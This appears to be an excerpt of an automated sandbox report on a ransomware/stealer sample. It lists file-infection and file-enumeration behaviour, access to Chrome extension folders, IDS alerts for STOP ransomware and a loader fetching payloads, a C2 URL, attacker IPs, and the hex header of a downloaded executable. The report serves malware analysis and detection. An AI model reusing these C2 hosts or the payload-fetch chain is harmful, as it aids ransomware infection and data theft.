                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.cdqw source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232315956.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293986477.0000000003B27000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295241780.0000000003B2F000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292390530.0000000003B09000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310270639.0000000003B32000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295203158.0000000003B51000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2351367972.0000000003C9A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2340729338.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2337425529.0000000003C82000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error3.txt source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\0 source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2321203058.0000000003CA7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282081320.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282440855.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324655611.0000000003CAC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\t\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2321203058.0000000003CA7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324655611.0000000003CAC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316130649.0000000003CCD000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\f source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282529154.00000000036A1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2311222602.00000000036A1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294187046.0000000003EE3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284034690.0000000003F2D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292702111.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\d source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255239356.0000000003B10000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232801684.0000000003B10000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255319462.0000000003B1B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292648224.0000000003C65000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341825344.0000000003C86000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273490567.0000000003C47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315115698.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2254663516.0000000003C5D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310618606.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332695677.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292043905.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360091492.0000000003C8E000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282440855.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273727258.0000000003C73000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323157191.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316085239.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316719842.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196da
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\les\j source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341959833.0000000003B24000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2348441168.0000000003B2B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2342176452.0000000003B27000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\%; source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332585421.0000000004035000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ngs\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2321203058.0000000003CA7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324655611.0000000003CAC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316130649.0000000003CCD000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323506783.0000000003F3B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323100107.0000000003F23000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2314739889.0000000003F03000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2322324444.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2319577426.0000000003ECB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\PS source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2321203058.0000000003CA7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324655611.0000000003CAC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316130649.0000000003CCD000.00000004.00000020.00020000.00000000.sdmp

                Spreading

                barindex
                Infects executable files (exe, dll, sys, html)
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA0160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00BA0160
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00B9F730
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,0_2_00B9FB98
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EF730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_002EF730
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002F0160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_002F0160
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EFB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_002EFB98
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00B9F730
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BA0160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00BA0160
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,3_2_00B9FB98
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00411A10 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_00411A10
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041C260 wsprintfA,FindFirstFileA,memset,lstrcat,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,strtok_s,strtok_s,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,5_2_0041C260
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040F200 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_0040F200
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041D400 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_0041D400
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00401600 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_00401600
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040F8B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,5_2_0040F8B0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041CBA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,5_2_0041CBA0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040EDB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,5_2_0040EDB0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041CFF0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,5_2_0041CFF0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041C6B0 strtok_s,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,strtok_s,5_2_0041C6B0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]4_2_005B1D60
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax4_2_005B1D60
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]5_2_004013C0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax5_2_004013C0

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49732 -> 175.120.254.9:80
                Source: TrafficSnort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49734 -> 186.147.159.149:80
                Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49734 -> 186.147.159.149:80
                Source: TrafficSnort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49735 -> 175.120.254.9:80
                Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49735 -> 175.120.254.9:80
                Source: TrafficSnort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49740 -> 175.120.254.9:80
                Source: TrafficSnort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49746 -> 175.120.254.9:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://zexeq.com/test1/get.php
                Source: global trafficTCP traffic: 192.168.2.4:49737 -> 116.202.0.196:10220
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 12 Jan 2024 05:48:01 GMTContent-Type: application/octet-streamContent-Length: 367104Last-Modified: Wed, 10 Jan 2024 12:50:02 GMTConnection: closeETag: "659e927a-59a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 60 e6 e8 d7 24 87 86 84 24 87 86 84 24 87 86 84 3a d5 13 84 35 87 86 84 3a d5 05 84 76 87 86 84 3a d5 02 84 00 87 86 84 03 41 fd 84 27 87 86 84 24 87 87 84 78 87 86 84 3a d5 0c 84 25 87 86 84 3a d5 12 84 25 87 86 84 3a d5 17 84 25 87 86 84 52 69 63 68 24 87 86 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 02 ae 12 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 0e 04 00 00 b4 01 00 00 00 00 00 94 22 00 00 00 10 00 00 00 20 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 05 00 00 04 00 00 57 7d 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 55 04 00 28 00 00 00 00 10 05 00 ca c1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 48 04 00 18 00 00 00 58 48 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 04 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 79 0d 04 00 00 10 00 00 00 0e 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 3d 00 00 00 20 04 00 00 3e 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 97 00 00 00 60 04 00 00 86 00 00 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 a1 01 00 00 00 00 05 00 00 02 00 00 00 d6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ca c1 00 00 00 10 05 00 00 c2 00 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: GET /bg3goty HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 172.67.139.220 172.67.139.220
                Source: Joe Sandbox ViewIP Address: 186.147.159.149 186.147.159.149
